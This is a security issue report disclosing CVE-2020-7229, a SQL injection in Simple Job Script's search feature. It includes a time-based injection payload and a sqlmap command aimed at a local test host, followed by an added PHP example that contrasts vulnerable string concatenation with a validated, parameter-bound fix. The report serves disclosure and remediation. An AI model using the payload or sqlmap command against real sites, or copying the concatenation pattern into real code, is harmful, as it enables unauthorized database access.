[security] CVE-2020-7229, SQL injection in search function #7

Closed
@gwen001

Description: An issue was discovered in Simplejobscript.com SJS before 1.65. There is unauthenticated SQL injection via the search engine. The parameter is landing_location. The function is countSearchedJobs(). The file is _lib/class.Job.php.

Environment:

  • Version: 1.64
  • OS: Ubuntu 16.10
  • Web server: Apache 2.4.18
  • PHP: 5.6.40
  • Database: MySQL 5.7.28
  • URL: /searched

Payload: landing_title=aaa&landing_location=77+or+(select+(sleep(2)))

Steps to Reproduce:
$ sqlmap --threads=10 --batch --dbms=mysql -u "http://local.simplejobscript.net/searched" --data="landing_title=aaa&landing_location=77" -p landing_location --banner

PoC:
sjs-sqli-search
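
The bug class reported above, as an added example that is not part of the original issue and is not Simple Job Script code: a numeric parameter concatenated into SQL, beside a validated and bound version. The `jobs` table, its columns and both function names are hypothetical, and an in-memory SQLite database (needs the `pdo_sqlite` extension) stands in for MySQL so the block runs offline.

```php
<?php
// Added illustration, not Simple Job Script source. The jobs table, its columns
// and both function names are hypothetical; the rows below are constructed.

// Vulnerable pattern: the request value lands unquoted in a numeric context,
// so quote-escaping does nothing and any SQL expression is accepted.
function buildCountQueryUnsafe($location)
{
    return 'SELECT COUNT(*) FROM jobs WHERE city_id = ' . $location;
}

// Hardened pattern: strict integer validation, then bound parameters.
function countJobsByCity(PDO $db, $title, $location)
{
    $cityId = filter_var($location, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1)));
    if ($cityId === false) {
        throw new InvalidArgumentException('landing_location must be a positive integer');
    }
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM jobs WHERE title LIKE :title AND city_id = :city');
    $stmt->bindValue(':title', '%' . $title . '%', PDO::PARAM_STR);
    $stmt->bindValue(':city', $cityId, PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, city_id INTEGER)');
$db->exec("INSERT INTO jobs (title, city_id) VALUES ('aaa developer', 77), ('aaa tester', 12)");

// Form-decoded value of landing_location from the report's payload.
$reported = '77 or (select (sleep(2)))';

// Concatenation: the subquery becomes part of the SQL text itself.
echo buildCountQueryUnsafe($reported), "\n";
// Bound parameter: a legitimate numeric value is validated and counted.
echo countJobsByCity($db, 'aaa', '77'), "\n";
// The reported value fails integer validation before any query is prepared.
try {
    countJobsByCity($db, 'aaa', $reported);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```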
